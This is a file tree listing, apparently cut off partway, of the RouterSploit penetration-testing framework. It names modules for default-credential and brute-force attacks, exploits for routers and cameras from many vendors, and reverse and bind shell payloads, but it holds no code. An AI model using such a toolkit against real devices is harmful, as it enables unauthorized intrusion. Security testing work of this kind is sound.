Repository: threat9/routersploit Branch: master Commit: 6c5d37cf9c78 Files: 1215 Total size: 1.5 MB Directory structure: gitextract_hxqwu9j7/ ├── .dockerignore ├── .github/ │ ├── ISSUE_TEMPLATE.md │ └── PULL_REQUEST_TEMPLATE.md ├── .gitignore ├── .travis/ │ ├── install.sh │ └── run.sh ├── .travis.yml ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── MANIFEST.in ├── Makefile ├── README.md ├── docker-compose.yaml ├── docs/ │ └── modules/ │ ├── creds/ │ │ ├── cameras/ │ │ │ ├── acti/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── american_dynamics/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── arecont/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── avigilon/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── avtech/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── axis/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── basler/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── brickcom/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── canon/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── cisco/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── dlink/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── geovision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── grandstream/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── 
ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── hikvision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── honeywell/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── iqinvision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── jvc/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── mobotix/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── samsung/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── sentry360/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── siemens/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── speco/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── stardot/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── vacron/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ └── videoiq/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ └── routers/ │ │ ├── asmax/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── asus/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── belkin/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── bhu/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── billion/ │ │ │ ├── 
ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── cisco/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── comtrend/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── dlink/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── fortinet/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── huawei/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── ipfire/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── juniper/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── linksys/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── mikrotik/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── movistar/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netcore/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netgear/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netsys/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── pfsense/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── technicolor/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── thomson/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── tplink/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── 
telnet_default_creds.md │ │ ├── ubiquiti/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── zte/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ └── zyxel/ │ │ ├── ftp_default_creds.md │ │ ├── ssh_default_creds.md │ │ └── telnet_default_creds.md │ ├── encoders/ │ │ ├── perl/ │ │ │ ├── base64.md │ │ │ └── hex.md │ │ ├── php/ │ │ │ ├── base64.md │ │ │ └── hex.md │ │ └── python/ │ │ ├── base64.md │ │ └── hex.md │ ├── exploits/ │ │ ├── cameras/ │ │ │ ├── acti/ │ │ │ │ └── acm_5611_rce.md │ │ │ ├── geuterbruck/ │ │ │ │ └── efd_2250.md │ │ │ ├── jovision/ │ │ │ │ └── jovision_credentials_disclosure.md │ │ │ └── multi/ │ │ │ └── cctv_dvr_rce.md │ │ ├── misc/ │ │ │ └── watchguard/ │ │ │ └── xcs_9_rce.md │ │ └── routers/ │ │ ├── asus/ │ │ │ ├── asuswrt_lan_rce.md │ │ │ └── infosvr_backdoor_rce.md │ │ ├── cisco/ │ │ │ └── rv320_command_injection.md │ │ ├── dlink/ │ │ │ ├── dir_655_866_652_rce.md │ │ │ └── dsl_2750b_rce.md │ │ ├── ipfire/ │ │ │ ├── ipfire_proxy_rce.md │ │ │ └── ipfire_shellshock.md │ │ ├── linksys/ │ │ │ └── eseries_themoon_rce.md │ │ ├── mikrotik/ │ │ │ └── winbox_auth_bypass_creds_disclosure.md │ │ ├── multi/ │ │ │ ├── tcp_32764_info_disclosure.md │ │ │ └── tcp_32764_rce.md │ │ └── zte/ │ │ └── zxhn_h108n_wifi_password_disclosure.md │ ├── generic/ │ │ └── upnp/ │ │ └── ssdp_msearch.md │ └── payloads/ │ ├── armle/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── cmd/ │ │ ├── awk_bind_tcp.md │ │ ├── awk_bind_udp.md │ │ ├── awk_reverse_tcp.md │ │ ├── bash_reverse_tcp.md │ │ ├── netcat_bind_tcp.md │ │ ├── netcat_reverse_tcp.md │ │ ├── perl_bind_tcp.md │ │ ├── perl_reverse_tcp.md │ │ ├── php_bind_tcp.md │ │ ├── php_reverse_tcp.md │ │ ├── python_bind_tcp.md │ │ ├── python_bind_udp.md │ │ ├── python_reverse_tcp.md │ │ └── python_reverse_udp.md │ ├── mipsbe/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── mipsle/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ 
├── perl/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── php/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── python/ │ │ ├── bind_tcp.md │ │ ├── bind_udp.md │ │ ├── reverse_tcp.md │ │ └── reverse_udp.md │ ├── x64/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ └── x86/ │ ├── bind_tcp.md │ └── reverse_tcp.md ├── requirements-dev.txt ├── requirements.txt ├── routersploit/ │ ├── __init__.py │ ├── core/ │ │ ├── __init__.py │ │ ├── bluetooth/ │ │ │ ├── __init__.py │ │ │ ├── btle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── btle_device.py │ │ │ │ └── btle_scanner.py │ │ │ └── btle_client.py │ │ ├── exploit/ │ │ │ ├── __init__.py │ │ │ ├── encoders.py │ │ │ ├── exceptions.py │ │ │ ├── exploit.py │ │ │ ├── option.py │ │ │ ├── payloads.py │ │ │ ├── printer.py │ │ │ ├── shell.py │ │ │ └── utils.py │ │ ├── ftp/ │ │ │ ├── __init__.py │ │ │ └── ftp_client.py │ │ ├── http/ │ │ │ ├── __init__.py │ │ │ └── http_client.py │ │ ├── snmp/ │ │ │ ├── __init__.py │ │ │ └── snmp_client.py │ │ ├── ssh/ │ │ │ ├── __init__.py │ │ │ └── ssh_client.py │ │ ├── tcp/ │ │ │ ├── __init__.py │ │ │ └── tcp_client.py │ │ ├── telnet/ │ │ │ ├── __init__.py │ │ │ └── telnet_client.py │ │ └── udp/ │ │ ├── __init__.py │ │ └── udp_client.py │ ├── interpreter.py │ ├── libs/ │ │ ├── __init__.py │ │ ├── apiros/ │ │ │ ├── __init__.py │ │ │ └── apiros_client.py │ │ └── lzs/ │ │ ├── __init__.py │ │ └── lzs.py │ ├── modules/ │ │ ├── __init__.py │ │ ├── creds/ │ │ │ ├── __init__.py │ │ │ ├── cameras/ │ │ │ │ ├── __init__.py │ │ │ │ ├── acti/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ │ ├── american_dynamics/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── arecont/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── 
telnet_default_creds.py │ │ │ │ ├── avigilon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── avtech/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── axis/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── basler/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ │ ├── brickcom/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── canon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── cisco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── dlink/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── geovision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── grandstream/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── hikvision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── honeywell/ │ │ │ │ │ ├── __init__.py │ │ │ 
│ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── iqinvision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── jvc/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── mobotix/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── samsung/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── sentry360/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── siemens/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── speco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── stardot/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── vacron/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ └── videoiq/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── generic/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_bruteforce.py │ │ │ │ ├── ftp_default.py │ │ │ │ ├── http_basic_digest_bruteforce.py │ │ │ │ ├── http_basic_digest_default.py │ │ │ │ ├── snmp_bruteforce.py │ │ │ │ ├── ssh_bruteforce.py │ │ │ │ ├── ssh_default.py │ │ │ │ ├── telnet_bruteforce.py │ │ │ │ └── telnet_default.py │ │ │ ├── printers/ │ 
│ │ │ └── __init__.py │ │ │ └── routers/ │ │ │ ├── 2wire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── 3com/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── __init__.py │ │ │ ├── asmax/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ ├── telnet_default_creds.py │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ ├── asus/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── belkin/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── bhu/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── billion/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── cisco/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── comtrend/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── dlink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── fortinet/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── huawei/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── ipfire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── juniper/ 
│ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── linksys/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── mikrotik/ │ │ │ │ ├── __init__.py │ │ │ │ ├── api_ros_default_creds.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── movistar/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netcore/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netgear/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netsys/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── pfsense/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ ├── technicolor/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── thomson/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── tplink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── ubiquiti/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── zte/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ └── zyxel/ │ │ │ ├── __init__.py │ │ │ ├── ftp_default_creds.py │ │ │ ├── ssh_default_creds.py │ │ │ └── 
telnet_default_creds.py │ │ ├── encoders/ │ │ │ ├── __init__.py │ │ │ ├── perl/ │ │ │ │ ├── base64.py │ │ │ │ └── hex.py │ │ │ ├── php/ │ │ │ │ ├── __init__.py │ │ │ │ ├── base64.py │ │ │ │ └── hex.py │ │ │ └── python/ │ │ │ ├── __init__.py │ │ │ ├── base64.py │ │ │ └── hex.py │ │ ├── exploits/ │ │ │ ├── __init__.py │ │ │ ├── cameras/ │ │ │ │ ├── __init__.py │ │ │ │ ├── acti/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── acm_5611_rce.py │ │ │ │ ├── avigilon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── videoiq_camera_path_traversal.py │ │ │ │ ├── beward/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── n100_rce.py │ │ │ │ ├── brickcom/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── corp_network_cameras_conf_disclosure.py │ │ │ │ │ └── users_cgi_creds_disclosure.py │ │ │ │ ├── cisco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── video_surv_path_traversal.py │ │ │ │ ├── dlink/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── dcs_930l_932l_auth_bypass.py │ │ │ │ ├── geuterbruck/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── efd_2250.py │ │ │ │ ├── grandstream/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── gxv3611hd_ip_camera_backdoor.py │ │ │ │ │ └── gxv3611hd_ip_camera_sqli.py │ │ │ │ ├── honeywell/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── hicc_1100pt_password_disclosure.py │ │ │ │ ├── jovision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── jovision_credentials_disclosure.py │ │ │ │ ├── multi/ │ │ │ │ │ ├── P2P_wificam_credential_disclosure.py │ │ │ │ │ ├── P2P_wificam_rce.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── cctv_dvr_rce.py │ │ │ │ │ ├── dvr_creds_disclosure.py │ │ │ │ │ ├── jvc_vanderbilt_honeywell_path_traversal.py │ │ │ │ │ └── netwave_ip_camera_information_disclosure.py │ │ │ │ ├── mvpower/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── dvr_jaws_rce.py │ │ │ │ ├── siemens/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── cvms2025_credentials_disclosure.py │ │ │ │ └── xiongmai/ │ │ │ │ ├── __init__.py │ │ │ │ └── uc_httpd_path_traversal.py │ │ │ ├── generic/ │ │ │ │ ├── __init__.py │ │ │ │ ├── heartbleed.py │ │ │ │ ├── shellshock.py 
│ │ │ │ └── ssh_auth_keys.py │ │ │ ├── misc/ │ │ │ │ ├── __init__.py │ │ │ │ ├── asus/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── b1m_projector_rce.py │ │ │ │ ├── miele/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── pg8528_path_traversal.py │ │ │ │ ├── watchguard/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── xcs_9_rce.py │ │ │ │ └── wepresent/ │ │ │ │ ├── __init__.py │ │ │ │ └── wipg1000_rce.py │ │ │ └── routers/ │ │ │ ├── 2wire/ │ │ │ │ ├── 4011g_5012nv_path_traversal.py │ │ │ │ ├── __init__.py │ │ │ │ └── gateway_auth_bypass.py │ │ │ ├── 3com/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ap8760_password_disclosure.py │ │ │ │ ├── imc_info_disclosure.py │ │ │ │ ├── imc_path_traversal.py │ │ │ │ ├── officeconnect_info_disclosure.py │ │ │ │ └── officeconnect_rce.py │ │ │ ├── __init__.py │ │ │ ├── asmax/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ar_1004g_password_disclosure.py │ │ │ │ └── ar_804_gu_rce.py │ │ │ ├── asus/ │ │ │ │ ├── __init__.py │ │ │ │ ├── asuswrt_lan_rce.py │ │ │ │ ├── infosvr_backdoor_rce.py │ │ │ │ └── rt_n16_password_disclosure.py │ │ │ ├── belkin/ │ │ │ │ ├── __init__.py │ │ │ │ ├── auth_bypass.py │ │ │ │ ├── g_n150_password_disclosure.py │ │ │ │ ├── g_plus_info_disclosure.py │ │ │ │ ├── n150_path_traversal.py │ │ │ │ ├── n750_rce.py │ │ │ │ └── play_max_prce.py │ │ │ ├── bhu/ │ │ │ │ ├── __init__.py │ │ │ │ └── bhu_urouter_rce.py │ │ │ ├── billion/ │ │ │ │ ├── __init__.py │ │ │ │ ├── billion_5200w_rce.py │ │ │ │ └── billion_7700nr4_password_disclosure.py │ │ │ ├── cisco/ │ │ │ │ ├── __init__.py │ │ │ │ ├── catalyst_2960_rocem.py │ │ │ │ ├── dpc2420_info_disclosure.py │ │ │ │ ├── firepower_management60_path_traversal.py │ │ │ │ ├── firepower_management60_rce.py │ │ │ │ ├── ios_http_authorization_bypass.py │ │ │ │ ├── rv320_command_injection.py │ │ │ │ ├── secure_acs_bypass.py │ │ │ │ ├── ucm_info_disclosure.py │ │ │ │ ├── ucs_manager_rce.py │ │ │ │ └── unified_multi_path_traversal.py │ │ │ ├── comtrend/ │ │ │ │ ├── __init__.py │ │ │ │ └── ct_5361t_password_disclosure.py │ │ 
│ ├── dlink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dcs_930l_auth_rce.py │ │ │ │ ├── dgs_1510_add_user.py │ │ │ │ ├── dir_300_320_600_615_info_disclosure.py │ │ │ │ ├── dir_300_320_615_auth_bypass.py │ │ │ │ ├── dir_300_600_rce.py │ │ │ │ ├── dir_300_645_815_upnp_rce.py │ │ │ │ ├── dir_645_815_rce.py │ │ │ │ ├── dir_645_password_disclosure.py │ │ │ │ ├── dir_655_866_652_rce.py │ │ │ │ ├── dir_815_850l_rce.py │ │ │ │ ├── dir_825_path_traversal.py │ │ │ │ ├── dir_850l_creds_disclosure.py │ │ │ │ ├── dir_8xx_password_disclosure.py │ │ │ │ ├── dns_320l_327l_rce.py │ │ │ │ ├── dsl_2640b_dns_change.py │ │ │ │ ├── dsl_2730_2750_path_traversal.py │ │ │ │ ├── dsl_2730b_2780b_526b_dns_change.py │ │ │ │ ├── dsl_2740r_dns_change.py │ │ │ │ ├── dsl_2750b_info_disclosure.py │ │ │ │ ├── dsl_2750b_rce.py │ │ │ │ ├── dsp_w110_rce.py │ │ │ │ ├── dvg_n5402sp_path_traversal.py │ │ │ │ ├── dwl_3200ap_password_disclosure.py │ │ │ │ ├── dwr_932_info_disclosure.py │ │ │ │ ├── dwr_932b_backdoor.py │ │ │ │ ├── multi_hedwig_cgi_exec.py │ │ │ │ └── multi_hnap_rce.py │ │ │ ├── fortinet/ │ │ │ │ ├── __init__.py │ │ │ │ └── fortigate_os_backdoor.py │ │ │ ├── huawei/ │ │ │ │ ├── __init__.py │ │ │ │ ├── e5331_mifi_info_disclosure.py │ │ │ │ ├── hg520_info_disclosure.py │ │ │ │ ├── hg530_hg520b_password_disclosure.py │ │ │ 